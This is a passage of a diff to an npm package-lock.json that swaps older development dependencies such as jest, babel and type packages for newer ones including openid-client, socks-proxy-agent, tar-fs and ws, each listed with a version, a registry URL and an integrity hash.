- }, - "node_modules/@types/lodash": { - "version": "4.14.195", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", - "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", - "dev": true - }, - "node_modules/@types/node": { - "version": "16.18.38", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.18.38.tgz", - "integrity": "sha512-6sfo1qTulpVbkxECP+AVrHV9OoJqhzCsfTNp5NIG+enM4HyM3HvZCO798WShIXBN0+QtDIcutJCjsVYnQP5rIQ==" - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "node_modules/oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==" - }, - "node_modules/@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "license": "ISC", "dependencies": { - "@types/node": "*" + "wrappy": "1" } }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, + "node_modules/openid-client": { + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", + "license": "MIT", "dependencies": { - "@types/yargs-parser": "*" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" + }, + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/parse-domain": { + "version": "8.2.2", + "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-8.2.2.tgz", + "integrity": "sha512-CoksenD3UDqphCHlXIcNh/TX0dsYLHo6dSAUC/QBcJRWJXcV5rc1mwsS4WbhYGu4LD4Uxc0v3ZzGo+OHCGsLcw==", + "license": "MIT", "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" + "is-ip": "^5.0.1" }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "bin": { + "parse-domain-update": "bin/update.js" } }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "license": "MIT", "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, + "node_modules/rfc4648": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.4.tgz", + "integrity": "sha512-rRg/6Lb+IGfJqO05HZkN50UtY7K/JhxJag1kP23+zyMfrvoB0B7RWv06MbOzoc79RgCdNTiUaNsTT1AJZ7Z+cg==", + "license": "MIT" + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "dependencies": { - "color-convert": "^2.0.1" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "license": "MIT", "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" }, "engines": { - "node": ">= 8" + "node": ">= 14" } }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", + "node_modules/socks/node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, "engines": { - "node": "*" + "node": ">= 12" } }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause" }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, + "node_modules/stream-buffers": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.3.tgz", + "integrity": "sha512-pqMqwQCso0PBJt2PQmDO0cFj0lyqmiwOMiMSkVtRokl7e+ZTRYgDHKnuZNbqjiJXgsg4nuqtD/zxuo9KqTp0Yw==", + "license": "Unlicense", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" + "node": ">= 0.10.0" } }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" }, - "engines": { - "node": ">=8" + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, + "node_modules/super-regex": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/super-regex/-/super-regex-0.2.0.tgz", + "integrity": "sha512-WZzIx3rC1CvbMDloLsVw0lkZVKJWbrkJ0k1ghKFmcnPrW1+jWbgTkTEWVtD9lMdmI4jZEz40+naBxl1dCUhXXw==", + "license": "MIT", "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" + "clone-regexp": "^3.0.0", + "function-timeout": "^0.1.0", + "time-span": "^5.1.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" + "node": ">=14.16" }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, + "node_modules/tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", + "license": "MIT", "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", "dependencies": { - "tweetnacl": "^0.14.3" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" + "b4a": "^1.6.4" } }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, + "node_modules/time-span": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/time-span/-/time-span-5.1.0.tgz", + "integrity": "sha512-75voc/9G4rDIJleOo4jPvN4/YC4GRZrY8yy1uU4lwrB3XEQbWve8zXoO5No4eFrGcTAMYyoY67p8jRQdtA1HbA==", + "license": "MIT", "dependencies": { - "fill-range": "^7.1.1" + "convert-hrtime": "^5.0.0" }, "engines": { - "node": ">=8" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "license": "MIT" + }, + "node_modules/typescript": { + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, + "license": "Apache-2.0", "bin": { - "browserslist": "cli.js" + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" }, "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + "node": ">=14.17" } }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "license": "BSD-2-Clause" }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "license": "MIT", "dependencies": { - "node-int64": "^0.4.0" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "license": "ISC" }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", + "node_modules/ws": { + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", + "license": "MIT", "engines": { - "node": ">=0.10.0" + "node": ">=10.0.0" + }, + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": ">=5.0.2" + }, + "peerDependenciesMeta": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { + "optional": true + } } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": 